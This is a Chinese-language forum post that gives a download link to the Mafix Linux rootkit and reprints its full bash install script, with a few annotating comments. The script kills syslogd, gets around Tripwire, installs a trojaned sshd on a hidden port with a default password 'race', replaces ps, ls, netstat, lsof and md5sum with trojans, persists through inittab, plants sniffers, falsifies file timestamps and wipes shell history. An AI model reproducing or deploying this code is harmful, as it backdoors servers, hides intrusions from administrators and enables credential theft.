MAFIX - Linux 2.6 rootkit
这后门很贱,服务器中过一次,属于这个后门的改版。那个添加了模块。
下载地址:
https://forum.eviloctal.com/attachment.php?aid=13419
内容:
MAXFIX
---HOW-TO
---mafix
---mafixlibs
---root
下面为root的内容,也就是安装脚本。
#!/bin/bash
######################
# mafix 0.2 #
# fud 2009/07/15 #
######################
BASEDIR=`pwd`
export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
BLK=' [1;30m'
MAG=' [1;35m'
CYN=' [1;30m'
RED='^[[1;32m'
DMAG=' [1;37m'
RES=' [0m'
echo "${CYN} ___ ___ ___ ${DMAG} ${CYN} ___ ${RES}"
echo "${CYN} /__/ / / / / ${DMAG} ___ ${CYN} /__/| ${RES}"
echo "${CYN} | |:: / /:: / /:/_ ${DMAG} / / ${CYN} | |:| ${RES}"
echo "${CYN} | |:|: / /:/: / /:/ / ${DMAG} / /:/ ${CYN} | |:| ${RES}"
echo "${CYN} __|__|:|: / /:/~/:: / /:/ /:/ ${DMAG}/__/:: ${CYN} __|__|:| ${RES}"
echo "${CYN} /__/::::| : /__/:/ /:/: /__/:/ /:/ ${DMAG}__/:__ ${CYN} /__/::::____${RES}"
echo "${CYN} :~~__/ :/:/__/ :/:/ ${DMAG} :/ ${CYN} ~~~::::/${RES}"
echo "${CYN} : ::/ ::/ ${DMAG} __::/${CYN} |~~|:|~~ ${RES}"
echo "${CYN} : : : ${DMAG} /__/:/ ${CYN} | |:| ${RES}"
echo "${CYN} : : : ${DMAG} __/ ${CYN} | |:| ${RES}"
echo "${CYN} __/ __/ __/ ${DMAG} ${CYN} |__|/ ${RES}"
echo "${DMAG}${RES}"
echo "${DMAG}- the ferrari of rootkits - ${RES}"
sleep 5
echo "${CYN}mafix!${DMAG} > ${CYN} extracting libs...${RES}"
tar zxf mafixlibs
if [ "$(whoami)" != "root" ]; then
echo "${CYN}mafix!${DMAG} > ${CYN} you need to be root to backdoor the box...${RES}"
exit
fi
cd $BASEDIR
sleep 1
killall -9 syslogd >/dev/null 2>&1
startime=`date +%S`
echo "${CYN}mafix!${DMAG} > ${CYN} backdooring box...${RES}"
SYSLOGCONF="/etc/syslog.conf"
REMOTE=`grep -v "^#" "$SYSLOGCONF" | grep -v "^$" | grep "@" | cut -d '@' -f 2`
if [ ! -z "$REMOTE" ]; then
echo "${CYN}mafix!${DMAG} > ${CYN} Remote logging found! I hope you got access to these box:${RES}"
echo
for host in $REMOTE; do
echo -n " "
echo $host
done
echo
echo ' ${CYN}coz this box is logging to it${RES}'
echo
else
echo "${CYN}mafix!${DMAG} > ${CYN} no remote logging found...${RES}"
fi
uname=`uname -n`
twd=/var/lib/tripwire/$uname.twd
if [ -d /etc/tripwire ]; then
echo "${CYN}mafix!${DMAG} > ${CYN} WARNING: TRIPWIRE FOUND!${RES}"
if [ -f /var/lib/tripwire/$uname.twd ]; then
chattr -isa $twd #去保护,如果有的话,覆盖,chattr +isa 写保护
else
echo "${CYN}mafix!${DMAG} > ${CYN} no tripwire db found...${RES}"
fi
else
echo "${CYN}mafix!${DMAG} > ${CYN} no tripwire was detected..${RES}"
fi
# restoring login
if [ -f /sbin/xlogin ]; then
chattr -isa /sbin/xlogin
chattr -isa /bin/login
mv -f /sbin/xlogin /bin/login
chmod 7455 /bin/login
chattr +isa /bin/login
fi
echo "${CYN}mafix!${DMAG} > ${CYN} installing trojans...${RES}"
if [ -f /etc/sh.conf ]; then
chattr -isa /etc/sh.conf
rm -rf /etc/sh.conf
fi
# checking if we got needed libs and filez
if [ ! -f /lib/libproc.a ]; then
mv bin/lib/libproc.a /lib/ 2>/dev/null
fi
if [ ! -f /lib/libproc.so.2.0.6 ]; then
mv bin/lib/libproc.so.2.0.6 /lib/ 2>/dev/null
fi
echo "${CYN}mafix!${DMAG} > ${CYN} hold on...${RES}"
/sbin/ldconfig >/dev/null 2>&1
if [ ! -f /usr/bin/md5sum ]; then
touch -acmr /bin/ls bin/md5sum
cp bin/md5sum /usr/bin/md5sum
fi
DEFPASS=race
DEFPORT=11111
if test -n "$1" ; then
echo "${CYN}mafix!${DMAG} > ${CYN} Password:${DMAG} $1${RES}"
cd $BASEDIR/bin
echo -n $1|md5sum > /etc/sh.conf #生成密码文件
else
echo "${CYN}mafix!${DMAG} > ${CYN} Password:${DMAG} $DEFPASS${RES}"
echo -n $DEFPASS|md5sum > /etc/sh.conf
fi
touch -acmr /bin/ls /etc/sh.conf
chown -f root:root /etc/sh.conf
chattr +isa /etc/sh.conf #写保护
if test -n "$2" ; then
echo "${CYN}mafix!${DMAG} > ${CYN} Port:${DMAG} $2${RES}"
echo "Port $2" >> $BASEDIR/bin/.sh/sshd_config
echo "3 $2" >> $BASEDIR/bin/headers/hosts.h
echo "4 $2" >> $BASEDIR/bin/headers/hosts.h
cat $BASEDIR/bin/.sh/shdcf2 >> $BASEDIR/bin/.sh/sshd_config ; rm -rf $BASEDIR/bin/.sh/shdcf2
mv $BASEDIR/bin/.sh/sshd_config $BASEDIR/bin/.sh/shdcf 2>/dev/null
else
echo "${CYN}mafix!${DMAG} > ${CYN} Password:${DMAG} $DEFPORT${RES}"
echo "Port $DEFPORT" >> $BASEDIR/bin/.sh/sshd_config
echo "3 $2" >> $BASEDIR/bin/headers/hosts.h
echo "4 $2" >> $BASEDIR/bin/headers/hosts.h
cat $BASEDIR/bin/.sh/shdcf2 >> $BASEDIR/bin/.sh/sshd_config ; rm -rf $B ASEDIR/bin/.sh/shdcf2
mv $BASEDIR/bin/.sh/sshd_config $BASEDIR/bin/.sh/shdcf 2>/dev/null
fi
if [ -f /lib/lidps1.so ]; then
chattr -isa /lib/lidps1.so
rm -rf /lib/lidps1.so
fi
if [ -f /usr/include/hosts.h ]; then
chattr -isa /usr/include/hosts.h
rm -rf /usr/include/hosts.h
fi
if [ -f /usr/include/file.h ]; then
chattr -isa /usr/include/file.h
rm -rf /usr/include/file.h
fi
if [ -f /usr/include/log.h ]; then
chattr -isa /usr/include/log.h
rm -rf /usr/include/log.h
fi
if [ -f /usr/include/proc.h ]; then
chattr -isa /usr/include/proc.h
rm -rf /usr/include/proc.h
fi
cd $BASEDIR
mv $BASEDIR/bin/headers/lidps1.so /lib/lidps1.so 2>/dev/null
touch -acmr /bin/ls /lib/lidps1.so #修改文件时间与/bin/ls 时间相同
touch -acmr /bin/ls $BASEDIR/bin/headers/* #修改时间
mv $BASEDIR/bin/headers/* /usr/include/ 2>/dev/null
# Ok lets start creating dirs
SSHDIR=/lib/libsh.so
HOMEDIR=/usr/lib/libsh
if [ -d /lib/libsh.so ]; then
chattr -isa /lib/libsh.so
chattr -isa /lib/libsh.so/*
rm -rf /lib/libsh.so
fi
if [ -d /usr/lib/libsh ]; then
chattr -isa /usr/lib/libsh
chattr -isa /usr/lib/libsh/*
rm -rf /usr/lib/libsh/*
fi
mkdir $SSHDIR 2>/dev/null
touch -acmr /bin/ls $SSHDIR
mkdir $HOMEDIR 2>/dev/null
touch -acmr /bin/ls $HOMEDIR
cd $BASEDIR/bin
mv .sh/* $SSHDIR/ 2>/dev/null
mv .sh/.bashrc $HOMEDIR 2>/dev/null
if [ -f /sbin/ttyload ]; then
chattr -AacdisSu /sbin/ttyload
rm -rf /sbin/ttyload
fi
if [ -f /usr/sbin/ttyload ]; then
chattr -isa /usr/sbin/ttyload
rm -rf /usr/sbin/ttyload
fi
if [ -f /sbin/ttymon ]; then
chattr -isa /sbin/ttymon
rm -rf /sbin/ttymon
fi
mv $SSHDIR/sshd /sbin/ttyload 2>/dev/null
chmod a+xr /sbin/ttyload 2>/dev/null
chmod o-w /sbin/ttyload 2>/dev/null
touch -acmr /bin/ls /sbin/ttyload
chattr +isa /sbin/ttyload
kill -9 `pidof ttyload` >/dev/null 2>&1
mv $BASEDIR/bin/ttymon /sbin/ttymon 2>/dev/null
chmod a+xr /sbin/ttymon 2>/dev/null
touch -acmr /bin/ls /sbin/ttymon
chattr +isa /sbin/ttymon
kill -9 `pidof ttymon` >/dev/null 2>&1
cp /bin/bash $SSHDIR
# INITTAB SHUFFLING
chattr -isa /etc/inittab
cat /etc/inittab |grep -v ttyload|grep -v getty > /tmp/.init1
cat /etc/inittab |grep getty > /tmp/.init2
echo "# Loading standard ttys" >> /tmp/.init1
echo "0:2345:once:/usr/sbin/ttyload" >> /tmp/.init1
cat /tmp/.init2 >> /tmp/.init1
echo "" >> /tmp/.init1
echo "# modem getty." >> /tmp/.init1
echo "# mo:235:respawn:/usr/sbin/mgetty -s 38400 modem" >> /tmp/.init1
echo "" >> /tmp/.init1
echo "# fax getty (hylafax)" >> /tmp/.init1
echo "# mo:35:respawn:/usr/lib/fax/faxgetty /dev/modem" >> /tmp/.init1
echo "" >> /tmp/.init1
echo "# vbox (voice box) getty" >> /tmp/.init1
echo "# I6:35:respawn:/usr/sbin/vboxgetty -d /dev/ttyI6" >> /tmp/.init1
echo "# I7:35:respawn:/usr/sbin/vboxgetty -d /dev/ttyI7" >> /tmp/.init1
echo "" >> /tmp/.init1
echo "# end of /etc/inittab" >> /tmp/.init1
echo "/sbin/ttyload -q >/dev/null 2>&1" > /usr/sbin/ttyload
echo "/sbin/ttymon >/dev/null 2>&1" >> /usr/sbin/ttyload
touch -acmr /bin/ls /usr/sbin/ttyload
chmod +x /usr/sbin/ttyload 2>/dev/null
chattr +isa /usr/sbin/ttyload
/usr/sbin/ttyload >/dev/null 2>&1
touch -amcr /etc/inittab /tmp/.init1
mv -f /tmp/.init1 /etc/inittab 2>/dev/null
rm -rf /tmp/.init2
# MAKING SURE WE GOT IT BACKDORED RIGHT !
if [ ! "`grep ttyload /etc/inittab`" ]; then
echo "${CYN}mafix!${DMAG} > ${CYN} inittab broken, sshd wont be loaded upon reboot :(${RES}"
fi
# Say hello to md5sum fixer boys n gurls !
if [ -f /sbin/ifconfig ]; then
/usr/bin/md5sum /sbin/ifconfig >> .shmd5
fi
if [ -f /bin/ps ]; then
/usr/bin/md5sum /bin/ps >> .shmd5
fi
if [ -f /bin/ls ]; then
/usr/bin/md5sum /bin/ls >> .shmd5
fi
if [ -f /bin/netstat ]; then
/usr/bin/md5sum /bin/netstat >> .shmd5
fi
if [ -f /usr/bin/find ]; then
/usr/bin/md5sum /usr/bin/find >> .shmd5
fi
if [ -f /usr/bin/top ]; then
/usr/bin/md5sum /usr/bin/top >> .shmd5
fi
if [ -f /usr/sbin/lsof ]; then
/usr/bin/md5sum /usr/sbin/lsof >> .shmd5
fi
if [ -f /usr/bin/slocate ]; then
/usr/bin/md5sum /usr/bin/slocate >> .shmd5
fi
if [ -f /usr/bin/dir ]; then
/usr/bin/md5sum /usr/bin/dir >> .shmd5
fi
if [ -f /usr/bin/md5sum ]; then
/usr/bin/md5sum /usr/bin/md5sum >> .shmd5
fi
if [ ! -f /dev/srd0 ]; then
./encrypt -e .shmd5 /dev/srd0
touch -acmr /bin/ls /dev/srd0
chattr a+r /dev/srd0
chown -f root:root /dev/srd0
fi
rm -rf .shmd5
# time change bitch
touch -acmr /sbin/ifconfig ifconfig >/dev/null 2>&1
touch -acmr /bin/ps ps >/dev/null 2>&1
touch -acmr /bin/ls ls >/dev/null 2>&1
touch -acmr /bin/netstat netstat >/dev/null 2>&1
touch -acmr /usr/bin/find find >/dev/null 2>&1
touch -acmr /usr/bin/top top >/dev/null 2>&1
touch -acmr /usr/sbin/lsof lsof >/dev/null 2>&1
touch -acmr /sbin/syslogd syslogd >/dev/null 2>&1
touch -acmr /usr/bin/slocate slocate >/dev/null 2>&1
touch -acmr /usr/bin/dir dir >/dev/null 2>&1
touch -acmr /usr/bin/md5sum md5sum >/dev/null 2>&1
touch -acmr /usr/bin/pstree pstree >/dev/null 2>&1
# Backdoor ps/top/du/ls/netstat/etc..
cd $BASEDIR/bin
BACKUP=/usr/lib/libsh/.backup
mkdir $BACKUP 2>/dev/null
# ps ...
if [ -f /usr/bin/ps ]; then
chattr -isa /usr/bin/ps
cp /usr/bin/ps $BACKUP
mv -f ps /usr/bin/ps 2>/dev/null
chattr +isa /usr/bin/ps
fi
if [ -f /bin/ps ]; then
chattr -isa /bin/ps
cp /bin/ps $BACKUP
mv -f ps /bin/ps 2>/dev/null
chattr +isa /bin/ps
fi
# ifconfig ...
chattr -isa /sbin/ifconfig
cp /sbin/ifconfig $BACKUP
mv -f ifconfig /sbin/ifconfig 2>/dev/null
chattr +isa /sbin/ifconfig
# netstat ...
if [ -f /usr/sbin/netstat ]; then
chattr -isa /usr/sbin/netstat
mv -f netstat /usr/sbin/netstat 2>/dev/null
chattr +isa /usr/sbin/netstat
fi
chattr -isa /bin/netstat
cp /bin/netstat $BACKUP
mv -f netstat /bin/netstat 2>/dev/null
chattr +isa /bin/netstat
# top ...
if [ -f /usr/bin/top ]; then
chattr -isa /usr/bin/top
cp /usr/bin/top $BACKUP
mv -f top /usr/bin/top 2>/dev/null
chattr +isa /usr/bin/top
if [ -f /lib/libncurses.so.5 ]; then
ln -s /lib/libncurses.so.5 /lib/libncurses.so.4 2>/dev/null
fi
if [ -f /usr/lib/libncurses.so.5 ]; then
ln -s /usr/lib/libncurses.so.5 /lib/libncurses.so.4 2>/dev/null
fi
fi
# slocate ...
if [ -f /usr/bin/slocate ]; then
chattr -isa /usr/bin/slocate
cp /usr/bin/slocate $BACKUP
mv -f slocate /usr/bin/slocate 2>/dev/null
chattr +isa /usr/bin/slocate
fi
# ls ...
chattr -isa /bin/ls
cp /bin/ls $BACKUP
mv -f ls /bin/ls 2>/dev/null
chattr +isa /bin/ls
# find ...
if [ -f /usr/bin/find ]; then
chattr -isa /usr/bin/find
cp /usr/bin/find $BACKUP
mv -f find /usr/bin/find 2>/dev/null
chattr +isa /usr/bin/find
fi
# dir ...
if [ -f /usr/bin/dir ]; then
chattr -isa /usr/bin/dir
cp /usr/bin/dir $BACKUP
mv -f dir /usr/bin/dir 2>/dev/null
chattr +isa /usr/bin/dir
fi
# lsof ...
if [ -f /usr/sbin/lsof ]; then
chattr -isa /usr/sbin/lsof
cp /usr/sbin/lsof $BACKUP
mv -f lsof /usr/sbin/lsof 2>/dev/null
chattr +isa /usr/sbin/lsof
fi
# pstree ...
if [ -f /usr/bin/pstree ]; then
chattr -isa /usr/bin/pstree
cp /usr/bin/pstree $BACKUP
mv -f pstree /usr/bin/pstree 2>/dev/null
chattr +isa /usr/bin/pstree
fi
# md5sum ...
chattr -isa /usr/bin/md5sum
cp /usr/bin/md5sum $BACKUP
mv -f md5sum /usr/bin/md5sum 2>/dev/null
chattr +isa /usr/bin/md5sum
echo "${CYN}mafix!${DMAG} > ${CYN} backdoored some daemons (netstat, ps)${RES}"
cd $BASEDIR
mkdir $HOMEDIR/.sniff 2>/dev/null
mv $BASEDIR/bin/shsniff $HOMEDIR/.sniff/shsniff 2>/dev/null
chmod +x $BASEDIR/bin/sshd 2>/dev/null
mv $BASEDIR/bin/shp $HOMEDIR/.sniff/shp 2>/dev/null
mv $BASEDIR/bin/shsb $HOMEDIR/shsb 2>/dev/null
mv $BASEDIR/bin/hide $HOMEDIR/hide 2>/dev/null
touch -acmr /bin/ls $HOMEDIR/.sniff/shsniff
touch -acmr /bin/ls $HOMEDIR/.sniff/shp
touch -acmr /bin/ls $HOMEDIR/shsb
touch -acmr /bin/ls $HOMEDIR/hide
chmod +x $HOMEDIR/.sniff/* 2>/dev/null
chmod +x $HOMEDIR/shsb 2>/dev/null
chmod +x $HOMEDIR/hide 2>/dev/null
./bin/sshd $1 $2 >> /dev/null
echo "${CYN}mafix!${DMAG} > ${CYN} checking for some vuln daemons....${RES}"
ps aux > /tmp/.procs
if [ "`cat /tmp/.procs | grep named`" ]; then
echo "${CYN}mafix!${DMAG} > ${CYN} NAMED FOUND! PATCH IT!${RES}"
fi
if [ -f /usr/sbin/wu.ftpd ]; then
echo "${CYN}mafix!${DMAG} > ${CYN} WU-FTPD FOUND! PATCH IT!${RES}"
fi
if [ "`cat /tmp/.procs | grep smbd`" ]; then
echo "${CYN}mafix!${DMAG} > ${CYN} SAMBA FOUND! PATCH IT!${RES}"
fi
if [ "`cat /tmp/.procs | grep rpc.statd`" ]; then
echo "${CYN}mafix!${DMAG} > ${CYN} RPC.STATD FOUND! PATCH IT!${RES}"
fi
rm -rf /tmp/.procs
netstat -natp > /tmp/.stats
if [ "`cat /tmp/.stats | grep 443 | grep http`" ]; then
echo "${CYN}mafix!${DMAG} > ${CYN} MOD_SSL FOUND! PATCH IT!${RES}"
fi
rm -rf /tmp/.stats
# CHECKING FOR HOSTILE ROOTKITS/BACKDORS
mkdir $HOMEDIR/.owned 2>/dev/null
if [ -f /etc/ttyhash ]; then
chattr -AacdisSu /etc/ttyhash
rm -rf /etc/ttyhash
fi
if [ -d /lib/ldd.so ]; then
chattr -isa /lib/ldd.so
chattr -isa /lib/ldd.so/*
mv /lib/ldd.so $HOMEDIR/.owned/tk8
echo "${CYN}mafix!${DMAG} > ${CYN} tk8 found and owned!{RES}"
fi
if [ -d /usr/src/.puta ]; then
chattr -isa /usr/src/.puta
chattr -isa /usr/src/.puta/*
mv /usr/src/.puta $HOMEDIR/.owned/tk7
echo "${CYN}mafix!${DMAG} > ${CYN} tk7 found and owned!{RES}"
fi
if [ -f /usr/sbin/xntpd ]; then
chattr -isa /usr/sbin/xntpd
rm -rf /usr/sbin/xntpd
fi
if [ -f /usr/sbin/nscd ]; then
chattr -isa /usr/sbin/nscd
rm -rf /usr/sbin/nscd
fi
if [ -d /usr/include/bex ]; then
chattr -isa /usr/info/termcap.info-5.gz; rm -rf /usr/info/termcap.info-5.gz
chattr -isa /usr/include/audit.h; rm -rf /usr/include/audit.h
chattr -isa /usr/include/bex
chattr -isa /usr/include/bex/*
mv /usr/include/bex/ $HOMEDIR/.owned/bex2
if [ -f /var/log/tcp.log ]; then
chattr -isa /var/log/tcp.log
cp /var/log/tcp.log $HOMEDIR/.owned/bex2/snifflog
fi
chattr -isa /usr/bin/sshd2 >/dev/null 2>&1
rm -rf /usr/bin/sshd2 >/dev/null 2>&1
echo "${CYN}mafix!${DMAG} > ${CYN} bex2 found and owned!{RES}"
fi
if [ -d /dev/tux/ ]; then
chattr -isa /usr/bin/xsf >/dev/null 2>&1
rm -rf /usr/bin/xsf >/dev/null 2>&1
chattr -isa /usr/bin/xchk >/dev/null 2>&1
rm -rf /usr/bin/xchk >/dev/null 2>&1
chattr -isa /dev/tux >/dev/null 2>&1
mv /dev/tux $HOMEDIR/.owned/tuxkit
echo "${CYN}mafix!${DMAG} > ${CYN} tuxkit found and owned!{RES}"
fi
if [ -f /usr/bin/ssh2d ]; then
chattr -isa /usr/bin/ssh2d
rm -rf /usr/bin/ssh2d
chattr -isa /lib/security/.config/
chattr -isa /lib/security/.config/*
rm -rf /lib/security/.config
echo "${CYN}mafix!${DMAG} > ${CYN} optickit found and owned!{RES}"
fi
if [ -f /etc/ld.so.hash ]; then
chattr -isa /etc/ld.so.hash
rm -rf /etc/ld.so.hash
fi
chattr +isa /usr/lib/libsh
chattr +isa /lib/libsh.so
# GREPPING SHITZ FROM rc.sysinit and inetd.conf
if [ -f /etc/rc.d/rc.sysinit ]; then
chattr -isa /etc/rc.d/rc.sysinit
cat /etc/rc.d/rc.sysinit | grep -v "# Xntps (NTPv3 daemon) startup.."| grep -v "/us r/sbin/xntps"| grep -v "/usr/sbin/nscd" > /tmp/.grep
chmod +x /tmp/.grep
touch -acmr /etc/rc.d/rc.sysinit /tmp/.grep
mv -f /tmp/.grep /etc/rc.d/rc.sysinit
rm -rf /tmp/.grep
fi
if [ -f /etc/inetd.conf ]; then
chattr -isa /etc/inetd.conf
cat /etc/inetd.conf | grep -v "6635"| grep -v "9705" > /tmp/.grep
touch -acmr /etc/inted.conf /tmp/.grep
mv -f /tmp/.grep /etc/inetd.conf
rm -rf /tmp/.grep
fi
# KILLING SOME LAMME DAEMONS
killall -9 -q nscd >/dev/null 2>&1
killall -9 -q xntps >/dev/null 2>&1
killall -9 -q mountd >/dev/null 2>&1
killall -9 -q mserv >/dev/null 2>&1
killall -9 -q psybnc >/dev/null 2>&1
killall -9 -q t0rns >/dev/null 2>&1
killall -9 -q linsniffer >/dev/null 2>&1
killall -9 -q sniffer >/dev/null 2>&1
killall -9 -q lpsched >/dev/null 2>&1
killall -9 -q sniff >/dev/null 2>&1
killall -9 -q sn1f >/dev/null 2>&1
killall -9 -q sshd2 >/dev/null 2>&1
killall -9 -q xsf >/dev/null 2>&1
killall -9 -q xchk >/dev/null 2>&1
killall -9 -q ssh2d >/dev/null 2>&1
echo "${CYN}mafix!${DMAG} > ${CYN} sysinfo:${RES}"
MYIPADDR=`/sbin/ifconfig eth0 | grep "inet addr:" | awk -F ' ' ' {print $2} ' | cut -c6-`
echo "${CYN}mafix!${DMAG} > hostname :${CYN} `hostname -f` ($MYIPADDR)${RES}"
uname -a | awk '{ print $11 }' >/tmp/info_tmp
echo "${CYN}mafix!${DMAG} > arch: ${CYN}`cat /tmp/info_tmp` -+- bogomips : `cat /proc/cpuinfo | grep bogomips | awk ' {print $3}'` '${RES}"
echo "${CYN}mafix!${DMAG} > alternative ip: ${CYN} "`hostname -i`" -+- Might be ["`/sbin/ifconfig | grep eth | wc -l`" ] active adapters.${RES}"
if [ -f /etc/redhat-release ]; then
echo -n "${CYN}mafix!${DMAG} > dist: ${CYN} `head -1 /etc/redhat-release`${RES}"
elif [ -f /etc/slackware-version ]; then
echo -n "${CYN}mafix!${DMAG} > dist: ${CYN} `head -1 /etc/slackware-version`${RES}"
elif [ -f /etc/debian_version ]; then
echo -n "${CYN}mafix!${DMAG} > dist: ${CYN} `head -1 /etc/debian_version`${RES}"
elif [ -f /etc/SuSE-release ]; then
echo -n "${CYN}mafix!${DMAG} > dist: ${CYN} `head -1 /etc/SuSE-release`${RES}"
elif [ -f /etc/issue ]; then
echo -n "${CYN}mafix!${DMAG} > dist: ${CYN} `head -1 /etc/issue`${RES}"
else echo -n "${CYN}mafix!${DMAG} > dist: ${CYN} unknown${RES}"
fi
echo
echo -n "${CYN}mafix!${DMAG} > cleaning up some traces... ${RES}"
unset HISTFILE;unset HISTSIZE;unset HISTORY;unset HISTSAVE;unset HISTFILESIZE
if [ -f /.bash_history ]; then
chattr -isa /.bash_history >/dev/null 2>&1
rm -rf /.bash_history
fi
if [ -f /bin/.bash_history ]; then
chattr -isa /bin/.bash_history
rm -rf /bin/.bash_history
fi
cd $BASEDIR
rm -rf /tmp/.r*
cd ..
rm -rf mafix*
echo -n "${CYN}done!${RES}"
echo
rm -rf /tmp/info_tmp
endtime=`date +%S`
echo
echo
echo "${CYN} ___ ___ ___ ${DMAG} ${CYN} ___ ${RES}"
echo "${CYN} /__/ / / / / ${DMAG} ___ ${CYN} /__/| ${RES}"
echo "${CYN} | |:: / /:: / /:/_ ${DMAG} / / ${CYN} | |:| ${RES}"
echo "${CYN} | |:|: / /:/: / /:/ / ${DMAG} / /:/ ${CYN} | |:| ${RES}"
echo "${CYN} __|__|:|: / /:/~/:: / /:/ /:/ ${DMAG}/__/:: ${CYN} __|__|:| ${RES}"
echo "${CYN} /__/::::| : /__/:/ /:/: /__/:/ /:/ ${DMAG}__/:__ ${CYN} /__/::::____${RES}"
echo "${CYN} :~~__/ :/:/__/ :/:/ ${DMAG} :/ ${CYN} ~~~::::/${RES}"
echo "${CYN} : ::/ ::/ ${DMAG} __::/${CYN} |~~|:|~~ ${RES}"
echo "${CYN} : : : ${DMAG} /__/:/ ${CYN} | |:| ${RES}"
echo "${CYN} : : : ${DMAG} __/ ${CYN} | |:| ${RES}"
echo "${CYN} __/ __/ __/ ${DMAG} ${CYN} |__|/ ${RES}"
echo "${DMAG}${RES}"
echo "${DMAG} Password: $1 ${RES}"
echo "${DMAG} Port: $2 ${RES}"
if [ -f /usr/sbin/syslogd ]; then
/usr/sbin/syslogd -m 0
else
/sbin/syslogd -m 0
fi
if [ -f /usr/sbin/inetd ]; then
killall -HUP inetd >/dev/null 2>&1
elif [ -f /usr/sbin/xinetd ]; then
killall -HUP xinetd
fi